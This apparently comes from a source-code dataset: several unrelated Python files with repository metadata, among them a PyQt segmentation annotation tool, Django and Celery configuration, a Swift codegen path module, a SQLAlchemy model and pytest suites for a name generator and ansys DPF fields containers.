self.get_qimage(temp_overlay)))
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if not self.IsAdd and not self.IsEraser:
pass
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
def mouse_release(self, event):
thinkness = int(self.thinkness.text())
if self.mode == 'graphcut':
if not self.IsAdd and not self.IsEraser:
if self.seed_type == 1:
cv2.line(self.overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
else:
cv2.line(self.overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(0, 0, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if not self.IsAdd and not self.IsEraser:
pass
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
@pyqtSlot()
def on_graphcut(self):
if self.mode != 'graphcut':
print('Using GRAPH CUT')
self.mode = 'graphcut'
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.segment_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
self.graphcutButton.setStyleSheet("background-color:gray")
self.dextrButton.setStyleSheet("background-color:white")
@pyqtSlot()
def on_dextr(self):
if self.mode != 'dextr':
print('Using DEXTR CUT')
self.mode = 'dextr'
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.segment_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
self.graphcutButton.setStyleSheet("background-color:white")
self.dextrButton.setStyleSheet("background-color:gray")
@pyqtSlot()
def on_eraser(self):
if not self.IsEraser:
self.IsEraser = True
self.IsAdd = False
self.addButton.setStyleSheet("background-color:white")
self.eraserButton.setStyleSheet("background-color:gray")
else:
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
@pyqtSlot()
def on_add(self):
if not self.IsAdd:
self.IsAdd = True
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:gray")
else:
self.IsAdd = False
self.addButton.setStyleSheet("background-color:white")
@pyqtSlot()
def on_segment(self):
if self.mode == 'graphcut':
graph_maker = GraphMaker.GraphMaker(self.image)
height, width = np.shape(self.overlay)[:2]
for i in range(height):
for j in range(width):
if self.overlay[i, j, 0] != 0 or self.overlay[i, j, 1] != 0 or self.overlay[i, j, 2] != 0:
if self.overlay[i, j, 0] == 0 and self.overlay[i, j, 2] >= 200:
graph_maker.add_seed(j, i, 0)
elif self.overlay[i, j, 1] >= 200:
graph_maker.add_seed(j, i, 1)
graph_maker.create_graph()
self.segment_overlay = graph_maker.segment_overlay
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if self.flag:
if torch.cuda.is_available():
self.gpu_id = 0
self.net = resnet.resnet101(1, nInputChannels=4, classifier='psp')
print("Initializing weights from: {}".format(os.path.join(Path.models_dir(), self.modelName + '.pth')))
state_dict_checkpoint = torch.load(os.path.join(Path.models_dir(), self.modelName + '.pth'),
map_location=lambda storage, loc: storage)
# Remove the prefix .module from the model when it is trained using DataParallel
if 'module.' in list(state_dict_checkpoint.keys())[0]:
new_state_dict = OrderedDict()
for k, v in state_dict_checkpoint.items():
name = k[7:] # remove `module.` from multi-gpu training
new_state_dict[name] = v
else:
new_state_dict = state_dict_checkpoint
self.net.load_state_dict(new_state_dict)
self.net.eval()
if self.gpu_id >= 0:
torch.cuda.set_device(device=self.gpu_id)
self.net.cuda()
self.flag = False
image = np.array(self.image)
height, width = np.shape(image)[:2]
b, g, r = cv2.split(image)
image = cv2.merge([r, g, b])
extreme_points_ori = np.array(self.extreme_points_ori).astype(np.int)
bbox = utils.get_bbox(image, points=extreme_points_ori, pad=self.pad, zero_pad=True)
crop_image = utils.crop_from_bbox(image, bbox, zero_pad=True)
resize_image = utils.fixed_resize(crop_image, (512, 512)).astype(np.float32)
# Generate extreme point heat map normalized to image values
extreme_points = extreme_points_ori - [np.min(extreme_points_ori[:, 0]),
np.min(extreme_points_ori[:, 1])] + [self.pad,
self.pad]
extreme_points = (512 * extreme_points * [1 / crop_image.shape[1], 1 / crop_image.shape[0]]).astype(np.int)
extreme_heatmap = utils.make_gt(resize_image, extreme_points, sigma=10)
extreme_heatmap = utils.cstm_normalize(extreme_heatmap, 255)
# Concatenate inputs and convert to tensor
input_dextr = np.concatenate((resize_image, extreme_heatmap[:, :, np.newaxis]), axis=2)
input_dextr = torch.from_numpy(input_dextr.transpose((2, 0, 1))[np.newaxis, ...])
# Run a forward pass
inputs = Variable(input_dextr, requires_grad=True)
if self.gpu_id >= 0:
inputs = inputs.cuda()
with torch.no_grad():
outputs = self.net.forward(inputs)
outputs = upsample(outputs, size=(height, width), mode='bilinear', align_corners=True)
if self.gpu_id >= 0:
outputs = outputs.cpu()
pred = np.transpose(outputs.data.numpy()[0, ...], (1, 2, 0))
pred = 1 / (1 + np.exp(-pred))
pred = np.squeeze(pred)
result = utils.crop2fullmask(pred, bbox, im_size=image.shape[:2], zero_pad=True,
relax=self.pad) > self.thres
self.dextr_results.append(result)
self.extreme_points_ori = []
# self.segment_overlay = np.zeros((np.shape(image)))
overall_result = np.zeros_like(result)
for seg_result in self.dextr_results:
overall_result += seg_result
self.segment_overlay[:, :, 0][overall_result == True] = 255
self.segment_overlay[:, :, 0][overall_result == False] = 0
self.segment_overlay[:, :, 1][overall_result == True] = 255
self.segment_overlay[:, :, 1][overall_result == False] = 0
self.segment_overlay[:, :, 2][overall_result == True] = 255
self.segment_overlay[:, :, 2][overall_result == False] = 0
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
@pyqtSlot()
def on_next(self):
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.dextr_results = []
self.extreme_points_ori = []
self.id += 1
if self.id > self.lenths:
self.id = 0
self.image_name = self.images[self.id]
self.image = cv2.imread(os.path.join(self.image_dir,self.image_name))
self.segment_overlay = np.zeros_like(self.image)
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
@pyqtSlot()
def on_last(self):
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.dextr_results = []
self.extreme_points_ori = []
self.id -= 1
if self.id < 0:
self.id = self.lenths
self.image_name = self.images[self.id]
self.image = cv2.imread(os.path.join(self.image_dir,self.image_name))
self.segment_overlay = np.zeros_like(self.image)
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
@pyqtSlot()
def on_clear(self):
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.segment_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.dextr_results = []
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
@pyqtSlot()
def on_finish(self):
# TODO: finish segmentation, save result and turn to next image
save_path = os.path.join(self.result_dir, self.image_name[:-4]+'.png')
cv2.imwrite(save_path, self.segment_overlay)
self.dextr_results = []
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
if self.lenths > 1:
print("{} images remained.".format(str(self.lenths)))
else:
print("{} image remained.".format(str(self.lenths)))
if self.lenths <= 0:
print("Segmentation completed. Please close the window!")
else:
self.lenths -= 1
self.completed_image_list.append(self.images[self.id])
del self.images[self.id]
self.id += 1
if self.id > self.lenths:
self.id = 0
self.image_name = self.images[self.id]
self.image = cv2.imread(os.path.join(self.image_dir, self.image_name))
self.segment_overlay = np.zeros_like(self.image)
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
def get_image_with_overlay(self, show_mode=0):
if show_mode == 0:
return cv2.addWeighted(self.image, 0.7, self.overlay, 1, 0.1)
elif show_mode == 1:
return cv2.addWeighted(self.image, 0.9, self.segment_overlay.astype(np.uint8), 0.6, 0.1)
else:
print('wrong number!')
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = CutUI(Path.db_root_dir(), Path.save_root_dir())
app.exec_()
| 41.104615
| 119
| 0.569055
|
9c6e15732c9c0d2244580dc8bcc893f5bda16155
| 277
|
py
|
Python
|
cotidia/cms/urls/public.py
|
guillaumepiot/cotidia-cms
|
178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b
|
[
"BSD-3-Clause"
] | null | null | null |
cotidia/cms/urls/public.py
|
guillaumepiot/cotidia-cms
|
178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b
|
[
"BSD-3-Clause"
] | null | null | null |
cotidia/cms/urls/public.py
|
guillaumepiot/cotidia-cms
|
178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b
|
[
"BSD-3-Clause"
] | null | null | null |
from django.urls import path
from cotidia.cms.views.public import page, browserconfig
app_name = 'cotidia.cms'
urlpatterns = [
path('', page, name="home"),
path('browserconfig.xml', browserconfig, name="browserconfig"),
path('<path:slug>', page, name="page"),
]
| 23.083333
| 67
| 0.689531
|
faccec200b81b8f4ea2394bf1216c62e2ca5d87e
| 495
|
py
|
Python
|
src/app/celery.py
|
tempofr/stellar-anchor-server
|
6a318e5443936d9e29c6e9592801da8fb52735b7
|
[
"Apache-2.0"
] | null | null | null |
src/app/celery.py
|
tempofr/stellar-anchor-server
|
6a318e5443936d9e29c6e9592801da8fb52735b7
|
[
"Apache-2.0"
] | null | null | null |
src/app/celery.py
|
tempofr/stellar-anchor-server
|
6a318e5443936d9e29c6e9592801da8fb52735b7
|
[
"Apache-2.0"
] | 1
|
2021-09-15T01:55:46.000Z
|
2021-09-15T01:55:46.000Z
|
"""
This module sets up Celery for the Django application.
See: https://docs.celeryproject.org/en/latest/django/first-steps-with-django.html
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "app.settings")
app = Celery("app")
app.config_from_object("django.conf:settings", namespace="CELERY")
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
| 27.5
| 81
| 0.79798
|
2ad1284b17bd7cd2811d5702c79a6dfcf17769a7
| 534
|
py
|
Python
|
swift/codegen/lib/paths.py
|
adityasharad/ql
|
439dcc0731ae665402466a13daf12737ea3a2a44
|
[
"MIT"
] | 643
|
2018-08-03T11:16:54.000Z
|
2020-04-27T23:10:55.000Z
|
swift/codegen/lib/paths.py
|
DirtyApexAlpha/codeql
|
4c59b0d2992ee0d90cc2f46d6a85ac79e1d57f21
|
[
"MIT"
] | 1,880
|
2018-08-03T11:28:32.000Z
|
2020-04-28T13:18:51.000Z
|
swift/codegen/lib/paths.py
|
DirtyApexAlpha/codeql
|
4c59b0d2992ee0d90cc2f46d6a85ac79e1d57f21
|
[
"MIT"
] | 218
|
2018-08-03T11:16:58.000Z
|
2020-04-24T02:24:00.000Z
|
""" module providing useful filesystem paths """
import pathlib
import sys
import os
try:
workspace_dir = pathlib.Path(os.environ['BUILD_WORKSPACE_DIRECTORY']).resolve() # <- means we are using bazel run
swift_dir = workspace_dir / 'swift'
except KeyError:
_this_file = pathlib.Path(__file__).resolve()
swift_dir = _this_file.parents[2]
workspace_dir = swift_dir.parent
lib_dir = swift_dir / 'codegen' / 'lib'
templates_dir = swift_dir / 'codegen' / 'templates'
exe_file = pathlib.Path(sys.argv[0]).resolve()
| 28.105263
| 118
| 0.724719
|
8a1e63a4789873894c5207a127b1bf1a6d19fd0d
| 670
|
py
|
Python
|
models/upload.py
|
dharmasastra/learning-upload-files
|
763ff744e6f2fc6654aeac647401cdfe2c084c85
|
[
"MIT"
] | null | null | null |
models/upload.py
|
dharmasastra/learning-upload-files
|
763ff744e6f2fc6654aeac647401cdfe2c084c85
|
[
"MIT"
] | null | null | null |
models/upload.py
|
dharmasastra/learning-upload-files
|
763ff744e6f2fc6654aeac647401cdfe2c084c85
|
[
"MIT"
] | null | null | null |
from db import db
class UploadModel(db.Model):
__tablename__ = 'upload'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(200), nullable=False)
avatar = db.Column(db.String(300), nullable=False)
def __init__(self, name):
self.name = name
def json(self):
return {
'id': self.id,
'name': self.name,
'avatar': self.avatar
}
def save_image(self, avatar):
self.avatar = avatar
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
db.session.delete(self)
db.session.commit()
| 22.333333
| 54
| 0.58209
|
70d2e35534cbfb31e257a327376d43e5cddabc78
| 358
|
py
|
Python
|
test/test_language_dwarvish.py
|
evilchili/telisar
|
4152de28ed03afecb579c6065414439146b8b169
|
[
"Unlicense"
] | 1
|
2018-06-29T14:46:18.000Z
|
2018-06-29T14:46:18.000Z
|
test/test_language_dwarvish.py
|
evilchili/telisar
|
4152de28ed03afecb579c6065414439146b8b169
|
[
"Unlicense"
] | null | null | null |
test/test_language_dwarvish.py
|
evilchili/telisar
|
4152de28ed03afecb579c6065414439146b8b169
|
[
"Unlicense"
] | 1
|
2018-06-29T14:47:07.000Z
|
2018-06-29T14:47:07.000Z
|
import logging
import pytest
from telisar.languages.dwarvish import Dwarvish
@pytest.fixture
def dwarvish():
e = Dwarvish()
e._logger.setLevel(logging.DEBUG)
return e
@pytest.mark.parametrize('name', [
'Moradin',
'Ultar Ultarsson',
'Julia Ultarsson',
])
def test_existing_names(dwarvish, name):
assert dwarvish.is_valid(name)
| 17.9
| 47
| 0.712291
|
f083fe77eef463a9ae1f791e0bef573688e8f349
| 20,132
|
py
|
Python
|
tests/test_fieldscontainer.py
|
pscedu/DPF-Core
|
05816d1d4940aacc2b51055ab67b8f4c31fc1ca3
|
[
"MIT"
] | null | null | null |
tests/test_fieldscontainer.py
|
pscedu/DPF-Core
|
05816d1d4940aacc2b51055ab67b8f4c31fc1ca3
|
[
"MIT"
] | null | null | null |
tests/test_fieldscontainer.py
|
pscedu/DPF-Core
|
05816d1d4940aacc2b51055ab67b8f4c31fc1ca3
|
[
"MIT"
] | null | null | null |
import weakref
import pytest
import numpy as np
from ansys.dpf.core import FieldsContainer, Field, TimeFreqSupport
from ansys.dpf.core.custom_fields_container import ElShapeFieldsContainer, BodyFieldsContainer
from ansys.dpf.core import errors as dpf_errors
from ansys.dpf.core import fields_factory
from ansys.dpf.core import examples
from ansys.dpf import core as dpf
from ansys.dpf.core import operators as ops
from conftest import local_server
@pytest.fixture()
def disp_fc(allkindofcomplexity):
"""Return a displacement fields container"""
model = dpf.Model(allkindofcomplexity)
return model.results.displacement().outputs.fields_container()
def test_create_fields_container():
fc = FieldsContainer()
assert fc._message.id != 0
def test_empty_index():
fc = FieldsContainer()
with pytest.raises(IndexError):
fc[0]
def test_createby_message_copy_fields_container():
fc= FieldsContainer()
fields_container2 = FieldsContainer(fields_container=fc._message)
assert fc._message.id == fields_container2._message.id
def test_createbycopy_fields_container():
fc= FieldsContainer()
fields_container2 = FieldsContainer(fields_container=fc)
assert fc._message.id == fields_container2._message.id
def test_set_get_field_fields_container():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
assert fc.get_available_ids_for_label() == list(range(1,21))
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0})._message.id
assert fieldid !=0
assert fc.get_field(i)._message.id !=0
assert fc.get_field_by_time_complex_ids(timeid=i+1,complexid=0)._message.id !=0
assert fc[i]._message.id != 0
def test_get_label_scoping():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
scop = fc.get_label_scoping()
assert scop._message.id != 0
assert scop.ids == list(range(1,21))
def test_set_get_field_fields_container_new_label():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
assert fc.get_available_ids_for_label() == list(range(1,21))
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0})._message.id
assert fieldid !=0
assert fc.get_field(i)._message.id !=0
assert fc.get_field_by_time_complex_ids(timeid=i+1,complexid=0)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i)=={"time":i+1,"complex":0}
fc.add_label('shape')
for i in range(0,20):
mscop = {"time":i+1,"complex":0, 'shape':1}
fc.add_field(mscop,Field(nentities=i+10))
assert len(fc.get_fields({"time":i+1,"complex":0}))==2
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0, 'shape':1})._message.id
assert fieldid !=0
assert fc.get_field(i+20)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i+20)=={"time":i+1,"complex":0, 'shape':1}
def test_set_get_field_fields_container_new_label_default_value():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
fc.add_label('shape',3)
for i in range(0,20):
mscop = {"time":i+1,"complex":0, 'shape':1}
fc.add_field(mscop,Field(nentities=i+10))
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0, 'shape':1})._message.id
assert fieldid !=0
assert fc.get_field(i+20)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i+20)=={"time":i+1,"complex":0, 'shape':1}
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0, 'shape':3})._message.id
assert fieldid !=0
assert fc.get_field(i)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i)=={"time":i+1,"complex":0, 'shape':3}
def test_get_item_field_fields_container():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
for i in range(0,20):
assert fc[i]._message.id !=0
def test_delete_fields_container():
fc = FieldsContainer()
ref = weakref.ref(fc)
del fc
assert ref() is None
def test_str_fields_container(disp_fc):
assert 'time' in str(disp_fc)
assert 'location' in str(disp_fc)
def test_support_fields_container(disp_fc):
support = disp_fc.time_freq_support
assert len(support.time_frequencies) == 1
def test_getitem_fields_container(disp_fc):
assert isinstance(disp_fc[0], dpf.Field)
def test_has_label(disp_fc):
fc = FieldsContainer()
fc.labels = ['time','complex']
assert fc.has_label('time') == True
assert fc.has_label('complex') == True
assert fc.has_label('body') == False
assert disp_fc.has_label('time') == True
assert fc.has_label('body') == False
def test_add_field_by_time_id():
fc = FieldsContainer()
fc.labels = ['time','complex']
f1 = Field(3)
f1.append([10.2, 3.0, -11.8], 1)
f1.data
f1.append([10.2, 2.0, 11.8], 2)
f1.append([10.2, 1.0, -11.8], 3)
mscop1 = {"time": 1,"complex": 0}
fc.add_field(mscop1, f1)
assert len(fc) == 1
f2 = Field(1)
f2.append([4.0, 4.4, 3.6], 1)
mscop2 = {"time": 1,"complex": 1}
fc.add_field(mscop2, f2)
assert len(fc) == 2
f3 = Field(1)
f3.append([0.0, 0.4, 0.6], 1)
fc.add_field_by_time_id(f3, 2)
field_to_compare = Field(1)
field_to_compare.append([0.0, 0.4, 0.6], 1)
field = fc.get_field({'time': 2, 'complex': 0})
assert len(fc) == 3
assert np.allclose(field.data, field_to_compare.data)
fc.add_field_by_time_id(f3, 1)
field_result_1 = fc.get_field({'time': 1, 'complex': 0})
field_result_2 = fc.get_field({'time': 2, 'complex': 0})
assert np.allclose(field_result_1.data, field_result_2.data)
fc.add_label('body')
with pytest.raises(dpf_errors.DpfValueError):
fc.add_field_by_time_id(f3, 10)
def test_add_imaginary_field():
fc = FieldsContainer()
fc.labels = ['time','complex']
f1 = Field(3)
f1.append([10.2, 3.0, -11.8], 1)
f1.append([10.2, 2.0, 11.8], 2)
f1.append([10.2, 1.0, -11.8], 3)
mscop1 = {"time": 1,"complex": 1}
fc.add_field(mscop1, f1)
assert len(fc) == 1
f2 = Field(1)
f2.append([4.0, 4.4, 3.6], 1)
mscop2 = {"time": 1,"complex": 0}
fc.add_field(mscop2, f2)
assert len(fc) == 2
f3 = Field(1)
f3.append([0.0, 0.4, 0.6], 1)
fc.add_imaginary_field(f3, 2)
field_to_compare = Field(1)
field_to_compare.append([0.0, 0.4, 0.6], 1)
field = fc.get_field({'time': 2, 'complex': 1})
assert len(fc) == 3
assert np.allclose(field.data, field_to_compare.data)
fc.add_imaginary_field(f3, 1)
field_result_1 = fc.get_field({'time': 1, 'complex': 1})
field_result_2 = fc.get_field({'time': 2, 'complex': 1})
assert np.allclose(field_result_1.data, field_result_2.data)
fc.add_label('body')
with pytest.raises(dpf_errors.DpfValueError):
fc.add_imaginary_field(f3, 10)
def test_get_imaginary_field(disp_fc):
with pytest.raises(dpf_errors.DpfValueError):
disp_fc.get_imaginary_fields(1)
fc = FieldsContainer()
fc.labels = ["complex"]
with pytest.raises(dpf_errors.DpfValueError):
fc.get_imaginary_fields(1)
fc = FieldsContainer()
fc.labels = ["time", "complex"]
field_real = Field(1)
field_real.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1, "complex" : 0}, field_real)
field_to_check = fc.get_imaginary_field(1)
assert field_to_check is None
field_img = Field(1)
field_img.append([1.0, 301.2, 4.2], 20)
fc.add_field({"time" : 1, "complex" : 1}, field_img)
field_to_check_2 = fc.get_imaginary_field(1)
assert np.allclose(field_img.data, field_to_check_2.data)
def test_get_field_by_time_id():
fc = FieldsContainer()
fc.labels = ["complex"]
with pytest.raises(dpf_errors.DpfValueError):
fc.get_field_by_time_id(1)
fc = FieldsContainer()
fc.labels = ["time", "complex"]
field_img = Field(1)
field_img.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1, "complex" : 1}, field_img)
field_to_check = fc.get_field_by_time_id(1)
assert field_to_check is None
field_real = Field(1)
field_real.append([1.0, 301.2, 4.2], 20)
fc.add_field({"time" : 1, "complex" : 0}, field_real)
field_to_check_2 = fc.get_field_by_time_id(1)
assert np.allclose(field_real.data, field_to_check_2.data)
fc2 = FieldsContainer()
fc2.labels = ["time"]
f1 = Field(1)
f1.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1, "complex" : 0}, f1)
field_to_check = fc.get_field_by_time_id(1)
assert np.allclose(f1.data, field_to_check.data)
def test_collection_update_support():
# set time_freq_support
fc = FieldsContainer()
tfq = TimeFreqSupport()
frequencies = fields_factory.create_scalar_field(3)
frequencies.data = [0.1, 0.32, 0.4]
tfq.time_frequencies = frequencies
fc.time_freq_support = tfq
# get time_freq_support
tfq_check = fc.time_freq_support
assert np.allclose(tfq.time_frequencies.data, tfq_check.time_frequencies.data)
def test_deep_copy_over_time_fields_container(velocity_acceleration):
model = dpf.Model(velocity_acceleration)
stress = model.results.stress(time_scoping=[1,2,3])
fc = stress.outputs.fields_container()
copy = fc.deep_copy()
idenfc = dpf.operators.logic.identical_fc(fc,copy)
assert idenfc.outputs.boolean()
tf = fc.time_freq_support
copy = copy.time_freq_support
assert np.allclose(tf.time_frequencies.data, copy.time_frequencies.data)
assert tf.time_frequencies.scoping.ids == copy.time_frequencies.scoping.ids
def test_light_copy():
fc = FieldsContainer()
fc.labels = ["time"]
field = Field(1)
field.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1}, field)
assert fc[0]!=None
fc2 = FieldsContainer(fields_container=fc)
assert fc2[0]!=None
fc=2
assert fc2[0]!=None
def test_el_shape_fc(allkindofcomplexity):
model = dpf.Model(allkindofcomplexity)
fc = model.results.stress.split_by_shape.eval()
assert isinstance(fc, ElShapeFieldsContainer)
assert len(fc.beam_fields())==1
assert len(fc.shell_fields())==1
assert len(fc.solid_fields())==1
mesh =model.metadata.meshed_region
f = fc.beam_field()
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="beam"
f = fc.shell_field()
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="shell"
f = fc.solid_field()
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="solid"
def test_el_shape_time_fc():
model = dpf.Model(examples.download_all_kinds_of_complexity_modal())
fc = model.results.stress.on_all_time_freqs.split_by_shape.eval()
assert isinstance(fc, ElShapeFieldsContainer)
assert len(fc.beam_fields())==45
assert len(fc.shell_fields())==45
assert len(fc.solid_fields())==45
assert len(fc.beam_fields(1))==1
assert len(fc.shell_fields(3))==1
assert len(fc.solid_fields(20))==1
mesh =model.metadata.meshed_region
f = fc.beam_field(3)
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="beam"
f = fc.shell_field(4)
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="shell"
f = fc.solid_field(5)
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="solid"
def test_mat_time_fc():
model = dpf.Model(examples.download_all_kinds_of_complexity_modal())
fc = model.results.stress.on_all_time_freqs.split_by_body.eval()
assert isinstance(fc, BodyFieldsContainer)
assert len(fc.get_fields_by_mat_id(45))==45
assert np.allclose(fc.get_fields_by_mat_id(45)[0].data,fc.get_field_by_mat_id(45,1).data)
assert len(fc.get_mat_scoping().ids)==32
def test_add_operator_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field])
#operator with field out
forward = ops.utility.forward_field(field)
add = fc+forward
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array(field.data)*2.0)
#fc + list
add = fc+ [0.,1.,2.]
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,field.data + np.array([[0.,1.,2.],[0.,1.,2.]]))
#fc + float
add = fc+ 1.0
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[1., 2., 3.],[4., 5., 6.]]))
def test_minus_operator_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field])
#operator with field out
forward = ops.utility.forward_field(field)
add = fc-forward
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.zeros((2,3)))
#fc - list
add = fc- [0.,1.,2.]
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
